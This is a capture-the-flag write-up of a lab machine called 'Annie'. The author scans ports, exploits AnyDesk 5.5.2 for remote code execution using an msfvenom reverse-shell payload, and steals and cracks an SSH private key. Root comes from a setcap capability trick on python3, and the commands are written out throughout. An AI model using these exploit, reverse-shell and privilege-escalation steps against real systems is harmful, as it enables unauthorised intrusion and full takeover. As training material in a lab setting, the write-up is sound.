Started with the quick rustscan, found 3 open ports :
sudo rustscan -a -- -sC -sV -T4 -vv -oN Annie_nmap
At the scan results I observed that there is AnyDesk client running on port 7070. By looking at this I got some hint that tthis might be the point of initial access.
I quckly searched for google with the AnyDesk 7070 exploit & got the results :
Since, I don't have any version info I went with the first search result provied by exploit DB for version 5.5.2, ref :
This gave us the python exploit with Remote code execution :
As per the exploit, we have to create our own shell code with msfvenom, so I created my own:
msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.y.y LPORT=4444 -b "\x00\x25\x26" -f python -v shellcode
After many trial & error after many port lport change & many room reset, I finally received my connection on port 7070, on which AnyDesk is running.
I received the connection as user "Annie":(pwn3d!🙂)
Now, it's time to upgrade & stablize the shell:
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
stty raw -echo; fg (and press enter)
And, I got user flag into the home directory of the Annie itself.
In the Annie's folder I found a folder name ".ssh" where annie's private key is saved in 'id_rsa', so I copied it to my machine & tried to SSH but failed as it's asking for passphrase.
So, I quickly used a John the ripper module "ssh2john" to convert the id_rsa file into John the ripper format & tried to crack it. And in few seconds I was able to crack it as well.
I started with manual enumeration, like checking sudo version, cron jobs, sudo permissions etc. But I found something unusual in SUID list that there is something called "/sbin/setcap"
find / -perm -4000 -type f 2>/dev/null
I quckly searched for "setcap priv esc" & landed onto this page :
As per the blog if have the permission of setting the capablities then we can change the capablities of python3(as expample) & get the root privleges.
So, for the Priv Esc I followed the blog & copied the python3 binary in /tmp folder:
cp /usr/bin/python3 /tmp
Then changed the capablities of that python3 file:
setcap cap_setuid+ep /tmp/python3
And run the Python3 to set my uid as 0 & execute bash shell:
./python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
This gave me the root privleges:(pwn3d!🙂)
After successfull execution I got the root flag in root folder.